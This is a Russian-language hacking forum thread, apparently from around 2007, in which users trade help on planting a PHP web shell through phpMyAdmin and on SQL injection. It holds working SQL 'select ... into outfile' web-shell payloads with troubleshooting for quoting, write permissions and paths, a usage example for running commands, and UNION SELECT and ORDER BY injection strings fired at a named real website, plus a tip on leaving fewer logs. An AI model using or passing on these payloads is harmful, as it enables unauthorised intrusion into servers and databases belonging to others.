у меня такой вопрос есть ли способ загрузить web shell через phpMyAdmin Если есть то пожалуйста обьясните как или дайте топик где это уже обьяснялося

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'

и как всегда помог Spyder

еще один вопрос можно ли сделать какую либо ошибку в базе данных или в phpMyAdmin что бы определить путь к домашней директории

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'
Возникал такой же вопрос недели 3 назад...Пытался таим спопобом залить шелл, но не нашёл диру на запись...
Есть ли другой способ?

http://www.google.ru/search?complete=1&hl=ru&newwindow=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=j4T&q=phpmyadmin+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B% D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

Я другого способа не знаю, только так имхо

Spyder, про гугль я и без тебя знаю. Думал, может на ачате помогут...Ладно будем искать...

Не найдено ни одного документа, соответствующего запросу phpmyadmin раскры% D1‚РёРµ путей.

Рекомендации:
Убедитесь, что все слова написаны без ошибок.
Попробуйте использовать другие ключевые слова.
Попробуйте использовать более популярные ключевые слова.
Попробуйте уменьшить количество слов в запросе.


Вот что на твой запрос выдает

Не найдено ни одного документа, соответствующего запросу phpmyadmin раскры% D1‚РёРµ путей.

Рекомендации:
Убедитесь, что все слова написаны без ошибок.
Попробуйте использовать другие ключевые слова.
Попробуйте использовать более популярные ключевые слова.
Попробуйте уменьшить количество слов в запросе.


Вот что на твой запрос выдает
Ачат ставит пробелы в урле. Убери их.

спасибо а я то и не заметил

http://www.google.ru/search?q=phpmyadmin+раскрытие+путей

нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу

https://forum.antichat.ru/thread28461.html
https://forum.antichat.ru/threadnav24918-1-40.html

https://forum.antichat.ru/thread28461.html
по этой ссылке запускаю скрипт так
C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"
мне выдает следующее

C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"


=====_Script_Brut_Columns_=====

Wed Dec 26 16:59:16 2007

*URL:___________http://zonewm.biz/showa.php?id=129'
Evristic:______ON
Min_columns:___1
Max_columns:___50
Metod:_________UNION
SPACE:_________%20
NULL:__________1,2,3...
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log_check.txt

=====_Script_Brut_Columns_=====

GO!

Start evristic detection. Please, WAIT...

Detect MySQL

Start UNION SELECT

Please, wait...

Try 1 column...
------------------------

OK! Find 1 columns.

Right URL:
http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/*


что я не то делаю?

http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)

http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)
дело в том что нужен скрипт ручками то я подобрал дело в том что встречаются сайты у которых по 80 строк ручками подбирать придется долго

алгоритм
-1+order+by+1/*
-1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/*
итд...

heks, и логов меньше оставишь, и руку набьешь)))

блин давно эотел найти такой запрос пасиб AFoST

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'
Никога так не заливал. Решил попробовать вот что выплюнул
Кажется возникла ошибка в Вашем SQL запросе. Описание ошибки от MySQL сервера дано ниже, возможно, оно поможет Вам разобраться ERROR: Неизвестная строка с пунктуацией @ 8 STR: <? SQL: select <?system($_GET[cmd])?> into outfile '/www/sait.ru/phpBB/index.php'
Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?>
Тоже самое.

#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php

<?system($_GET['cmd'])?>
Обрами в "ковычки"

Обратил. Дальше что? Должен появиться веб шелл по адресе http://sait.ru/phpBB/index.php ? Пробовал. Его там нет.

Во-первых должны быть права на запись. Во-вторых узнай полный путь до этой директории.
//локалхост

select "<?system($_GET[cmd])?>" into outfile '/home/localhost/www/shell.php';

Потом обращяешься к шеллу так http://localhost/shell.php?cmd=ls -la

не надо там в кавычки ничего обрамлять
переведи этот пшп код в хекс например, ты вообще увеерн что у тебя права есть на запись файлов?

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'

по синтаксису sql необходимым условием является:
~ указание существующей таблицы
~ абсолютный путь к файлу
~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса

.. и тот кто реально хоть раз грузил так шелл, должен был это знать...

select '<?system($_GET[cmd])?>' from table_name_blaaaahh into outfile '/путь/к/шеллу.php'

Elekt, забыл код обрамить в кавычки
Я имел ввиду что надо делать так $_GET[cmd], а не так $_GET['cmd']
А вот про указание существующей таблицы - глупость
Я у себя на локалке с успехом выполнял запрос select 1 into outfile '/tmp/123.txt'